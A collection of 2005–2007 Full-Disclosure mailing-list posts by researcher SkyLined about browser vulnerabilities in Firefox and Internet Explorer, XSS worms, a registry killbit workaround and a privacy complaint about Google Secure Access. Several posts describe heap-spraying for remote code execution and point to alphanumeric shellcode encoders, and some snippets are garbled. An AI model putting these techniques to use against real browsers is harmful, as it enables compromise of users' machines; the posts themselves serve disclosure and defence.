Hi all, I recently stumbled upon this; http://ha.ckers.org/blog/20070709/nduja-cross-domainwebmail-xss-worm/ In short: It mentions a "new" kind of XSS worm; one that can infect multiple domains. I attempted to reply but my reply mysteriously never made it to the page. In an attempt to set the record straight on XSS worms, I'll post my reply here: (Cross-domain) XSS worms are much older than Samy or Nudja: http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00122.html It's been 5 years, I can see how you forgot about it. Samy and Nudja can claim the prize for the first _publicly_released_ XSS worms, but they are definately not the first of their kind. Also, it is a misconception to think that worms can only exists because of Ajax; a worm can just as easily spread without XMLHTTPRequest. I've been told that people saw XSS worms as early as 2000, but I have found no evidence to support this: let me know if you know something. Cheers, SkyLined -- Berend-Jan "SkyLined" Wever <[EMAIL PROTECTED]> ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SMC Networks Inc security contact anyone?
Hi all, I'm looking for a way to contact SMC (www.smc.com) security people about a few vulnerabilities in their routers. Both [EMAIL PROTECTED] and [EMAIL PROTECTED] failed. Cheers, SkyLined-- Berend-Jan Wever <[EMAIL PROTECTED]>http://spaces.msn.com/members/berendjanwever/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FireFox exploit updated
http://www.milw0rm.com Somewhere I totally forgot to credit Tom Ferris for finding the vulnerability. I hate it when people forget credits and now I am one of them :(. Please update your copy if you have mirrored it on your site. Cheers, SkyLined -- Berend-Jan Wever <[EMAIL PROTECTED]> http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Internet Exploiter meets FireFox
Hi all, Since I stopped releasing browser exploits, development on them seem to have slowed to a halt. For the latest FireFox vulnerability, I decided to finally port Internet Exploiter and thus PwnZilla was born. Technical details and documentation are all inline. FireFox 1.0.7 is out which seems to patch the vulnerability, I could find no release information in the website so far, but that may change in the near future. Get the exploit at http://www.milw0rm.com. Cheers, SkyLined PS. Does anybody ever talk to Dave Ahmad? All my posts from gmail seem to bounce of securityfocus for this reason: <[EMAIL PROTECTED]>: ezmlm-reject: fatal: Sorry, I don't accept messages of MIME Content-Type 'multipart/alternative' (#5.2.3) I'm wondering if it's just me or everybody that uses gmail?-- Berend-Jan Wever <[EMAIL PROTECTED]> http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Secure Access or "How to have peopledownload a trojan."
Hi, Maybe the frivolous way in which I addressed this problem lead people to believe I am not to be taken seriously. I would suggest you do not judge the book by its cover. Allow me to explain my point of view in more detail: 1. You are not securing your information, you are putting all your eggs in one basket. 2. I am not disputing the _reasons_ they may have to gather information or _what_ information the gather, I am merely pointing out that the problem is the _fact_ that they do so. Google Secure Access misleads their users by implying that _no-one_ will get to see anything of what you send to and receive from the Internet if you use their service. But if you read their privacy policy, you will find out that they are tracking this information themselves. A good deal of the services offered by Google are provided so Google can track how you use them. This is an exchange of services, you supply Google with your usage data and Google supplies you with whatever service you request. You may not pay for these services with money, but you do pay for them with information. Google uses this information to make money. I assumed this was common knowledge. Google may do whatever they see fit with this information within the boundaries of the law. The law binds Google to uphold the privacy policy. The privacy policy allows Google to do whatever they want if they so see fit by thinking up a good reason to do so. I am not saying they will, I am saying they can. Mr Boily: I did selectively quote parts of the privacy policy; I only quoted those parts that were relevant to my argument. Again, my argument is about the _fact_ that they collect data, not _what_ they collect nor the _reasons_ they may have for doing so. I also supplied the link to the policy so anyone can read the full version. We seem to use a different definition of spyware. This has happened before on this list. If you Google the definition, you will find everybody has their own. In my previous email and this I am using these definitions: "spyware" - Any software program that monitors a persons actions without his or her knowledge "trojan" - Any software program that presents itself to its users as something useful but, unknown to its user, also performs another action for its creators. If you agree to these definitions, you must see that Google Secure Access is both a trojan and spyware. Cheers,SkyLined-- Berend-Jan Wever <[EMAIL PROTECTED] >http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google Secure Access or "How to have people download a trojan."
This is a quite pathetic attempt to install a trojan, let me explain: http://wifi.google.com/faq.html "> "Google Secure Access is a downloadable client application that allows users to establish a more secure WiFi connection." "...your internet traffic will be encrypted, preventing others from viewing the information you transmit." snippets> So, by "more secure" Google means using encryption to prevent "others" from sniffing your packets. That's nice! What else does it do? Here's some information from the privacy policy: http://wifi.google.com/privacy-policy.html"> "Google may log some information from your web page requests ..." "Google also logs a small set of non-personally identifiable information ..." "Google will not sell or provide personally identifiable information to any third parties except ..." "... we may for a limited period of time preserve additional internet traffic or other information." Aha! What we have here is trojan spyware! It does exactly what it is supposed to protect you from. The second snippet clearly states that this concerns NON-personally identifiable information... what about the information mentioned in the first snippet, is that personally identifiable ? I guess so; the third snippet mentions Google selling or providing personally identifiable information, this must have come from somewhere! In the third snippet, Google neglects to mention non-personally identifiable information. What about selling that? I guess they do! The best thing about the whole policy is the last snippet, which undoes _everything_ stated before it. Nice one Google!! ;) I suggest that Google comes clean and replaces their privacy policy with a shorter, less confusing version: Here's some candy, go play! Btw. All your base are belong to us. Cheers, SkyLined -- Berend-Jan Wever <[EMAIL PROTECTED]>http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Shazara security contact?
Sorry for the noize, no usefull info in here. Anybody knows a security contact for Shazara? They have forums and such, but you need to register, which I hate. I want to contact them through email anyway. Cheers, SkyLined -- Berend-Jan Wever <[EMAIL PROTECTED]>http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FireFox "Host:" Buffer Overflow is not just exploitable on FireFox
Hi all, Research and development has let to a ~90% reliable working exploit for the IDN Heap Buffer overrun in FireFox on WinXP and Win2k3 as long as DEP is turned off and _javascript_ is enabled. Some tweaking might yield an even higher success ratio. It has also revealed that not only FireFox is vulnerable to this vulnerability, but the exact same exploit works on the latest releases of all these products based on the Mozilla engine: - Mozilla FireFox 1.0.6 and 1.5beta, - Mozilla Browser 1.7.11, - Netscape 8.0.3.3. Recommendations for this vulnerability: - FireFox and Mozilla: Install the workaround for (https://addons.mozilla.org/messages/307259.html).- Netscape: hope they'll respond to this email and release a workaround. - Wait for a patch and install it asap. Recommendations to make it harder to exploit any FireFox vulnerability: - Turn on DEP (Data Execution Prevention), - Turn off _javascript_, - Switch to another browser, - Do not browse untrusted sites, - Do not browse the web at all, - Unplug your machine from the web, - Wear a tinfoil hat. Cheers, SkyLined On 9/10/05, Berend-Jan Wever <[EMAIL PROTECTED]> wrote: (Just a little heads up, no details or PoC attached) The security vulnerability in Mozilla FireFox reported by Tom Ferris is exploitable on Windows. I developed a working exploit that seems to be 100% stable, though I've only tested it on one system. The exploit will not be released publicly untill patches are out. On a side note: it took only about 3 hours and 30 minutes to develop the exploit, so I might not be the only one able to write it. Cheers, SkyLined-- Berend-Jan Wever <[EMAIL PROTECTED]> http://www.edup.tudelft.nl/~bjwever -- Berend-Jan Wever <[EMAIL PROTECTED]> http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mozilla Firefox "Host:" Buffer Overflow Exploit
(Just a little heads up, no details or PoC attached) The security vulnerability in Mozilla FireFox reported by Tom Ferris is exploitable on Windows. I developed a working exploit that seems to be 100% stable, though I've only tested it on one system. The exploit will not be released publicly untill patches are out. On a side note: it took only about 3 hours and 30 minutes to develop the exploit, so I might not be the only one able to write it. Cheers, SkyLined-- Berend-Jan Wever <[EMAIL PROTECTED]>http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] COM objects and MSIE vulnerabilities recap + additional fix
Disclaimer: The information in this email is distributed WITHOUT ANY WARRANTY, TO THE EXTENT PERMITTED BY APPLICABLE LAW; without even the implied warranty of CORRECTNESS or FITNESS FOR A PARTICULAR PURPOSE. You know the drill...
Affected products: Various COM objects when loaded in Microsoft Internet Explorer.
Extend: DoS and remote arbitrary code execution.
Patches: MS05-037 and MS05-38 See below for additional killbit.Exploits: Internet Exploiter 4 will not be released to the public in the near future. Public exploits based on Internet Exploiter have been written by third
parties for a number of affected objects. They are available on the net from various sources.
Short description: A number of issues have been reported lately by various sources about Internet Explorer vulnerabilities in relation to specific COM objects. Research has shown that the root cause is the fact that these COM objects
are not designed to be loaded in IE at all. These objects therefore make wrongful assumptions about the state of the process they are loaded into, specifically about the contents of heap memory. This can be abused to
uncover unwanted features, like the ability to run arbitrary code on a victims machine. Short History: On June 24th 2002 'ken'@FTU reported a NULL-pointer exception in IE when
loading a specific COM object. The object was mmsys.cpl which uses clsid:{00022613---C000-0046}. The issue was discarded as a low impact DoS.
On April 18th 2005, Further research revealed that this was in fact a problem with the COM object reusing previously freed memory without initialising it. Part of the reused memory was used as a function pointer.
Careful allocating and freeing of memory prior to loading the object allowed remote code execution on Win2K. Internet Exploiter 4 was born. (This vulnerability does NOT seem to be exploitable on WinXPSP2, as claimed
by FrSIRT in their MS05-038 exploit) On June 17th 2005, Bernhard Müller and Martin Eiszner found a similar issue when loading javaprxy.dll and released their information to the public. On July 2nd, August 9th and August 17th 2005, FrSIRT released shamelessly
ripped code that claims to exploit a number of these objects. While failing to work on most occasions through lack of finesse, it does prove that even script-kiddies can easily write exploits by copy-pasting my Internet
Exploiter heap spraying code. It takes so little effort that it might actually cost you more time to add proper credits to the original author of the code.
Solution: I've been working with the Internet Explorer team on short term and long term solutions. The latest patch (MS05-038) will "killbit" a number of objects that were found to have issues when loaded in IE. These killbits
prevent exploits from loading these objects and abusing this vulnerability.
The latest exploit by FrSIRT targets "msdss.dll" with clsid EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F, which is not killbitted by ms05-038. I was unable to reproduce the vulnerability with version
7.10.3077.0 of the dll; the object doesn't even crash. From what I've heard everybody else seems to be unaffected too, so maybe it's just a local .fr thing. Just in case, here's a .reg file you can use to killbit this control;
Create a new .txt file, copy+paste this into it, rename it to .reg, double click it and say "yes, I want to add it to the registry." !!! Lines may wrap, you might have to remove the extra line-breaks !!!
cut here Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}]"Compatibility Flags"=dword:0400 cut here If you want to test if it works, here's a .html file that will show you;
Create a new .txt file, copy+paste this into it, rename it to .html, double click and it will tell you if you are safe (the object cannot be loaded) or if you might be vulnerable to this attack (the object can be loaded):
cut here --- Vulnerable...');" should be safe!');" classid=""
> cut here --- Greets: [EMAIL PROTECTED], [EMAIL PROTECTED], 0dd, 0x4553, l33tsecurity, NGS. Anti-Greets:
FrSIRT (I thought I was special, turns out they rip-off everybody's code!) Cheers,SkyLined
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Mozilla Firefox InstallVersion->compareTo() vulnerability lowered severity status
In short: Setting up complicated structures and knowing where they are should be rather trivial and if what you claim is true, this could be exploitable with a high degree of success. Details: It would be pretty easy to implement setting up three kinds of heap blocks; instead of running the heap block creation once, you run it three times to create three different kinds of information in three different locations. You can predict where the blocks will roughly be located since they're so large. In IE, large heap blocks (>= 0x0040 bytes IIRC) will always be allocated at an address ending with , making exact placement of structures up to 0x1 bytes big trivial. Assuming FF uses the same heap manager, you can setup complicated structures at known locations. Assuming what Aviv Raff is claiming about the vulnerability, this sonuds exploitable with a high degree of success. Cheers, SkyLined On 8/4/05, Aviv Raff <[EMAIL PROTECTED]> wrote: Hi, After more than 2 weeks of no response from the Mozilla Foundation ( https://bugzilla.mozilla.org/show_bug.cgi?id=295854), I've decided to disclose the following information:Version 1.0.5 of Firefox has fixed a vulnerability in the InstallVersion->compareTo() function that could potentially allow remote code execution. The Mozilla team have decided to set the severity status of the vulnerability to 'Moderate', instead of a higher severity status, claiming an exploitation of this vulnerability requires a predictable address, which means it's almost impossible to exploit. This is partly true. A script can be easily built to significantly increase the possibility of a successful exploitation. An attacker can use Skylined's Heap spraying method (used in "Internet Exploiter" - http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php), to fill the heap with fake data and vtbl structures that will point to the exploit code. This can be done by spraying 3 heap blocks - "data" block, "vtbl" block and "exploit" block - instead of one, as was presented by Skylined. The "data" block will point to a "vtbl" location which will be exactly the eax address + the heap block size. The data in the "vtbl" block will point to the "exploit" block which will be exactly the pointed "vtbl" address + the heap block size. The "exploit" block, of-course, will have the exploit code, padded with nops. This will boost the possibility that the eax address, specified by the attacker, will fall into the faked "data" block. Other methods can be applied to increase the risk even more. Therefore, my suggestion to the Mozilla Foundation is to raise the severity status of the vulnerability to 'High' or 'Critical'. Best regards,Aviv Raff. -- Berend-Jan Wever <[EMAIL PROTECTED]>http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: alpha numeric exploitation
> I'm trying to develop an alphanumeric payload that needs to do a JMP -600 bytes... ALPHA2 encodes shellcode to alphanumeric, unicode alphanumeric, uppercase alphanumeric and uppercase unicode alphanumeric. http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php You can download the source and compile it or use the online version. > Beyond that, I'd be extremely surprised if someone hasn't written > tutorials on doing alphanumeric-only payloads,Writing ia32 alphanumeric shellcodes by rix: http://www.phrack.org/show.php?p=57&a=15 Building IA32 'Unicode-Proof' Shellcodes by obscou: http://www.phrack.org/show.php?p=61&a=11 Writing IA32 Restricted Instruction Set Shellcode Decoder Loops by SkyLined http://www.edup.tudelft.nl/~bjwever/whitepaper_shellcode.html.php > if not even provided toolkits to take arbitrary code and "ASCII-fy" it. See ALPHA2. > Would dissembler do what you want? It should be able to squeeze the > ascii shellcode for you ;-) Nice tool ;) But printable characters are not all alphanumeric characters. Cheers, SkyLined-- Berend-Jan Wever <[EMAIL PROTECTED]>http://www.edup.tudelft.nl/~bjwever ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] #HACKPHREAK ADVISORY | BBQ CHICKEN WTF!
I propose we up the age limit to post on full-disclosure to 14. Cheers, SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Details and PoC for MS05-020 MSIE DHTML Object handling vulnerabilities
Details and PoC code for MSIE DHTML Object handling vulnerabilities are available online at my website: http://www.edup.tudelft.nl/~bjwever Note: page is not up-to-date, since it was written in August/September 2004. Additional information will be added when found during testing of MS05-20 patch. Cheers, SkyLined PS. I was pretty surprised nobody asked me why I went from Internet Exploiter 1 to Internet Exploiter 3 so now you know. .---, / Berend-Jan Wever aka SkyLined ) / [EMAIL PROTECTED]/ \ / http://www.edup.tudelft.nl/~bjwever / / / PGP key ID 0x48479882 / / / .., / / / ( ' / / . __ __/ / / / `'-._ /.' | / / / ( / /_.'.' / / / ( ) / ) |/ / / / ) (__ (__/ / / \---' --` '-< / \__.`\__\/\_\/ The information contained in this e-mail, if any, is often incorrect and probably plagiarized. It is intended solely for the amusement of the addressee. If you are not the intended recipient, my bad. Any action taken or omitted to be taken in reliance on the information in this message is your problem. Please notify me immediately if you have received it in error by reply e-mail and then delete this message from your system and any files in it's vicinity. I endeavour to ensure that my emails and any attachments are free from viruses, content, value or other contaminants. However, I cannot accept any responsibility might something worthwhile accidentally slip in. I therefore recommend you do not read them at all just to be sure. Please note that the statements and views expressed in this email and any attachments are completely chosen at random by the author and do not necessarily represent anything coherent, relevant or usefull. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
